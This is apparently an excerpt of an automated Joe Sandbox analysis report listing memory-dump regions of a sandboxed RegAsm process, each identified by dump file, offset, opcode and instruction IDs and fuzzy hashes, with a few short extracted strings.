                                                                    • Opcode Fuzzy Hash: 29d20cae1fcaa0d339b6e73ee4ae23661595f2a89b91bfdc00208d0cf54e34ff
                                                                    • Instruction Fuzzy Hash: E7218E31E00616DBCB09CFA4D4426EEB7B2BF89310F10862AF915FB640DB71A846CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4154716374.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_109d000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 173c7c623f13c8adae6a030303b5ef9f19a9027887144e855c20afb0689e0cda
                                                                    • Instruction ID: e34c1912fad69021b6121bc64292d4886a327773c042906f98b08e0a41dd3b19
                                                                    • Opcode Fuzzy Hash: 173c7c623f13c8adae6a030303b5ef9f19a9027887144e855c20afb0689e0cda
                                                                    • Instruction Fuzzy Hash: 6F2100B1544240DFDF11DF98D990B26BBA5EB88314F24C9AEE9894B242C33AD446DB62
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 152bea5bff499057df8845e791f3e3d7bbdfb5793ef8d58dbded5dcc76b69f26
                                                                    • Instruction ID: 17762fbd842c31564a1e163197e15a9ea2df8b431e91de75bfd72b89ab83e114
                                                                    • Opcode Fuzzy Hash: 152bea5bff499057df8845e791f3e3d7bbdfb5793ef8d58dbded5dcc76b69f26
                                                                    • Instruction Fuzzy Hash: 6921D270600111CBEF76676DE18A32C3A96EB82314F40096EF686DBFC1DE79D8C68742
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31f7120d543a60d25a8657750794be38768e8b690d0c9e01f52fb4ea133684cf
                                                                    • Instruction ID: dbd0986067b0d06749086a7262d13fbc1a23449ccc1f8ca06e434a51cf89ff4a
                                                                    • Opcode Fuzzy Hash: 31f7120d543a60d25a8657750794be38768e8b690d0c9e01f52fb4ea133684cf
                                                                    • Instruction Fuzzy Hash: 56217F30B04219CFDB58EB78C6157AE77F2AF89200F1004ADD246EB794DB369D41CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c71783efdcabd766da5b0481bedac4ce4fb2b1d791473a9553a54d5da84fea67
                                                                    • Instruction ID: 397e41b014aa0df45649aa439ef0ca642bb7577d6a189aa6a35cb6c064ae84ac
                                                                    • Opcode Fuzzy Hash: c71783efdcabd766da5b0481bedac4ce4fb2b1d791473a9553a54d5da84fea67
                                                                    • Instruction Fuzzy Hash: 9F214F30E0061ADBCB19CFA9D451AEEB7B2AF89350F10861AF955FB640DB71A845CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dcf1e31e6dc16e4ff8545541ca45c88087ea8541e8bce68d02971319c83028a9
                                                                    • Instruction ID: 877706b589e5a142a8b4805dc07539546e0a8cbdbb04f94dbad754445ec89553
                                                                    • Opcode Fuzzy Hash: dcf1e31e6dc16e4ff8545541ca45c88087ea8541e8bce68d02971319c83028a9
                                                                    • Instruction Fuzzy Hash: DA2108742101118FCF56EB7EF88575D37A6FB49308F104A69E10ACB6A6EA35DCC08B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23d9f3f705b831d7df20e9f478d2099aca5e9dbdc3cf1483b7281f0f69fb3f1e
                                                                    • Instruction ID: 757a60a40aafb54ebca91205f0cec6773b79343cc2229e3a02010ccbd8fb098a
                                                                    • Opcode Fuzzy Hash: 23d9f3f705b831d7df20e9f478d2099aca5e9dbdc3cf1483b7281f0f69fb3f1e
                                                                    • Instruction Fuzzy Hash: A0211934700609CFDB54EB78C959AAE77F1EB49304F1004A8F646EB365EB369D40CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8fc5e1683d669ff4f1f3e607e5987b21123c3dc31c57dc87f5e95f73812882a7
                                                                    • Instruction ID: 3491406b41593107bc3cf4be3c348419ea33997edfd046f4daded68ec20ec728
                                                                    • Opcode Fuzzy Hash: 8fc5e1683d669ff4f1f3e607e5987b21123c3dc31c57dc87f5e95f73812882a7
                                                                    • Instruction Fuzzy Hash: 85112375B10222DFCF14AB75984A69E7FF6FB48650F104429EB4ADB344EA39C843C780
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec501b5519e82e246f3d44fecbc3ad84f07a575dfe2702af0e317c760d82fb81
                                                                    • Instruction ID: a53e6a7e6dc492e7dbcc86d4dea063b388e4818268eba5573da8509155d4fb57
                                                                    • Opcode Fuzzy Hash: ec501b5519e82e246f3d44fecbc3ad84f07a575dfe2702af0e317c760d82fb81
                                                                    • Instruction Fuzzy Hash: 9C11C430B011549BEFA25ABDE40636937D2EB41314F1049BEF6C2CB68BEA65D8824BC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d04d9cee5199b25b07f22ab044a8ff4dfd09b0d572c42733a83b04a59c95b1ee
                                                                    • Instruction ID: 120401aed0c240092fb7d85943b00c7af7e9106589a5ae68dffb5eaf1ab7a07b
                                                                    • Opcode Fuzzy Hash: d04d9cee5199b25b07f22ab044a8ff4dfd09b0d572c42733a83b04a59c95b1ee
                                                                    • Instruction Fuzzy Hash: 8411B6307001048BEF91667DD40672D32D3EB85614F2049ADF6C2CF69BEA25DC824BD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df29a5bb714ee771dba617d27929c87f7edca5d99162f6d61c7001e8c1bb3ae9
                                                                    • Instruction ID: a85edcda32dd5e139405701b9e6865a2b7dd53d09a21982a76cf6382209c97c3
                                                                    • Opcode Fuzzy Hash: df29a5bb714ee771dba617d27929c87f7edca5d99162f6d61c7001e8c1bb3ae9
                                                                    • Instruction Fuzzy Hash: 4E11EB71B001118BEF91667DE81637937D2EB45314F14496EF5C1CFA8BE925C8864BC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4fe7bd04060ce33a039150484c84720f5954100400cd11c4b6498d3d0050b80c
                                                                    • Instruction ID: 4261d51092b250363d11eda304edea662d875cce9188e2d0af95bf706ba53a70
                                                                    • Opcode Fuzzy Hash: 4fe7bd04060ce33a039150484c84720f5954100400cd11c4b6498d3d0050b80c
                                                                    • Instruction Fuzzy Hash: C011A172E01215CFCF61EFB884922ED77E5EF58210B14047DD685E7B05EA35E8418B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4154716374.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_109d000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15be1deefb8234687f1cb153b30c633e22d6eab59ebae080dde87592304b3a2c
                                                                    • Instruction ID: 0c39cf5e5a77fd283a14c4a315d96b4dc301e3392ff900864a4fbb1b17f30980
                                                                    • Opcode Fuzzy Hash: 15be1deefb8234687f1cb153b30c633e22d6eab59ebae080dde87592304b3a2c
                                                                    • Instruction Fuzzy Hash: E7110D75544280CFDB12CF58C9D0B15FFA2FB84314F28C6AAE8894B652C33AD44ACB62
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8524073234fd89506cd33abc134be049ad287ce08cb3f45df58564485124411
                                                                    • Instruction ID: 540abb5e5666dfb4216ee18cfec9538813f743931a4c649551e478166f8e0180
                                                                    • Opcode Fuzzy Hash: b8524073234fd89506cd33abc134be049ad287ce08cb3f45df58564485124411
                                                                    • Instruction Fuzzy Hash: 9001AD31A01215CFCF21EFBC84422AE7BE5AB88210B1404BDE685E7A01EA35E841CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ae5fd06e194a97590524a766a8d53f691791b5e0da06ff3db8922ce2caf3c31
                                                                    • Instruction ID: 7c923cf157bfb05ae7b457f7c4a0800c01c9e9fb34d09145c0463acdf784e931
                                                                    • Opcode Fuzzy Hash: 9ae5fd06e194a97590524a766a8d53f691791b5e0da06ff3db8922ce2caf3c31
                                                                    • Instruction Fuzzy Hash: 3301C431A002058BDB00EF6ADD85B8ABBB1FFC4321F94C564D94C5F296EB70D945C7A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: edad3dc30ab3199e0aee8d9d6d4ce4fb321ca09a8f4445279e9f16a239e672ee
                                                                    • Instruction ID: 7f54dd475ca7405f0012bd593c32c9f041b455b062e3916cf46af57bd40962e1
                                                                    • Opcode Fuzzy Hash: edad3dc30ab3199e0aee8d9d6d4ce4fb321ca09a8f4445279e9f16a239e672ee
                                                                    • Instruction Fuzzy Hash: 8701D6B491011A9FCF45FBB6F88078D7BF1EB44304F105768D0059B254FE326E859B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0373ded54e73c15e4e5503110d78f385947bb8c15891f2746c0082f7dbadcb5
                                                                    • Instruction ID: 51dc97f043a831bc5d46750241f22fd659277765af1905b6e64a77fe2870725b
                                                                    • Opcode Fuzzy Hash: d0373ded54e73c15e4e5503110d78f385947bb8c15891f2746c0082f7dbadcb5
                                                                    • Instruction Fuzzy Hash: BFF0C435B001188FCB18DB74D599AAC77B2EF88315F6540A8E5069B3A4DF35AD42CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2209e9b8a583ad1b406af177888da56d89fb7306e387fbe7dc03b143a79c018
                                                                    • Instruction ID: 975dd2a8fe329fb2edb090ebf219a9ed0dfa44687ccbaf08463437834b2039de
                                                                    • Opcode Fuzzy Hash: b2209e9b8a583ad1b406af177888da56d89fb7306e387fbe7dc03b143a79c018
                                                                    • Instruction Fuzzy Hash: F8F0AFB090021A9FCF49FFBAF88058D7BB1EB84304F105769D0059B258FE326E858B82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                    • API String ID: 0-173664734
                                                                    • Opcode ID: 70d81726085509b6254d664468bd0adc037373130b2b5dde1848d9af9f2b302b
                                                                    • Instruction ID: 5917c35762304cc7cf9360e0edb3840bbb9537a021d3a34b7156eff1caf34253
                                                                    • Opcode Fuzzy Hash: 70d81726085509b6254d664468bd0adc037373130b2b5dde1848d9af9f2b302b
                                                                    • Instruction Fuzzy Hash: 52123E70B05219CFDB64DB65C894AAEB7B6FF88300F25856AD40AAB354DB309D85CF80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $tq$$tq$$tq$$tq$$tq$$tq
                                                                    • API String ID: 0-2574395493
                                                                    • Opcode ID: 685214a36df6f8d30a528576fb2db7d3dc73410fc806af53284bbc3d77f64fa3
                                                                    • Instruction ID: 28ddf5c054ab9f574ef8b5e067b80e49911ffd147a1b10cf632f418c3b8ea9cb
                                                                    • Opcode Fuzzy Hash: 685214a36df6f8d30a528576fb2db7d3dc73410fc806af53284bbc3d77f64fa3
                                                                    • Instruction Fuzzy Hash: 0FD23C30A00219CFDB14DF69C598AADB7B6FF89310F5485AAD449AB355EB30ED85CF80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0oWp$DqWp$PHtq
                                                                    • API String ID: 0-1088015993
                                                                    • Opcode ID: 55e7e3d3f3976447474975e4f79a49864faea7246e5b54051093188e559af954
                                                                    • Instruction ID: a4bdbca2e01c6c1a8e738f8e2f4b5c257e9fb59ffcd7c069233e41b13904f737
                                                                    • Opcode Fuzzy Hash: 55e7e3d3f3976447474975e4f79a49864faea7246e5b54051093188e559af954
                                                                    • Instruction Fuzzy Hash: 25227070B0010A8FCB14DB79D494AAEB7F6FF89310F24896AE406DB365DB35EC418B91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XPyq$\Oyq
                                                                    • API String ID: 0-3565698988
                                                                    • Opcode ID: 9ebce515fb757a5aa583e684f824f2d09043622e57b1cc425bcc76e946d33dfe
                                                                    • Instruction ID: 93d30435268cb1cca43c5b90d3f2c5f7bdae4dbe068ef6dfec2c14a63ab6379f
                                                                    • Opcode Fuzzy Hash: 9ebce515fb757a5aa583e684f824f2d09043622e57b1cc425bcc76e946d33dfe
                                                                    • Instruction Fuzzy Hash: 04D1C231B141198FDF24DB68D494ABDBBB6FB89310F24886BE44ADB355CA31DC45CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70d4ab9a97da025c38cdb1866b768fc6c7c2586a522dd12e95d759292015cf3a
                                                                    • Instruction ID: 5f4b76e35115c1cb9986fad020e1470589a2072292cd3ed7231ff3429fa18fe7
                                                                    • Opcode Fuzzy Hash: 70d4ab9a97da025c38cdb1866b768fc6c7c2586a522dd12e95d759292015cf3a
                                                                    • Instruction Fuzzy Hash: 45130C31D10B1A8ADB11EF68C88469DF7B1FF99300F55C79AE548A7221EB70AAC5CB41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $
                                                                    • API String ID: 0-3993045852
                                                                    • Opcode ID: f66fbb3aff5f2be513bf900f5074524c8b5ddc5b60173b43767dc489d9e61c2a
                                                                    • Instruction ID: f27ff5dfd63a078c09796b8b756da4d47be7f3050bc5398612e590148eabd42b
                                                                    • Opcode Fuzzy Hash: f66fbb3aff5f2be513bf900f5074524c8b5ddc5b60173b43767dc489d9e61c2a
                                                                    • Instruction Fuzzy Hash: 1322E271F042198FDF24DBA4C480AAEBBB6FF84310F24886AD849AB355DB35DC45DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \V]m
                                                                    • API String ID: 0-4105700344
                                                                    • Opcode ID: bfd1567981d7336c8203ca1e5268540e6458a86e70d8ad706219c34f15eb7fbd
                                                                    • Instruction ID: a0f5a12c7c8a4af8c6bfa7518606e786669588a606dd596e0c6c997b19bb9ea1
                                                                    • Opcode Fuzzy Hash: bfd1567981d7336c8203ca1e5268540e6458a86e70d8ad706219c34f15eb7fbd
                                                                    • Instruction Fuzzy Hash: A1B15BB0E002098FDF54CFA9D8867EEBBF2AF88314F14812DD955E7694EB749845CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d357c9386d9e7f152282c146fea1f21aa4d7bd3d6bf77b4dad97ae1809b79ab
                                                                    • Instruction ID: c4c6150f1f669d0cf940583c7fad063ba972921b45d94a9985aef76751418111
                                                                    • Opcode Fuzzy Hash: 2d357c9386d9e7f152282c146fea1f21aa4d7bd3d6bf77b4dad97ae1809b79ab
                                                                    • Instruction Fuzzy Hash: A7626C34B002098FDF14DB69D594AADBBF6FF88310F14856AE50AAB355DB35ED42CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d1fbe9e95cf45bb759c616d6022f9a3ec85fd5676a4de2d4068f82d4f97d77d
                                                                    • Instruction ID: 6c81b44573b0cedeb1167381515a33c0d775f84aea5606ac578c1c1839ff337f
                                                                    • Opcode Fuzzy Hash: 2d1fbe9e95cf45bb759c616d6022f9a3ec85fd5676a4de2d4068f82d4f97d77d
                                                                    • Instruction Fuzzy Hash: 51A16032E10209CFCF45DFB5C8449AEB7B2FF84310B15856AEA19AB311DB76E945CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15521115744e1700f4061fb9d51c20a73d7d1a2f92149867c374c9774e54e1b9
                                                                    • Instruction ID: becb6c81ac1031b511cd3531f7380626dc8bd852a52ec262b1a4b8b00a776fb8
                                                                    • Opcode Fuzzy Hash: 15521115744e1700f4061fb9d51c20a73d7d1a2f92149867c374c9774e54e1b9
                                                                    • Instruction Fuzzy Hash: 77C1C0B1A316468AE714CF65F85E18D7FB1BF85328B605309E2612F2E1DFB8149ACF44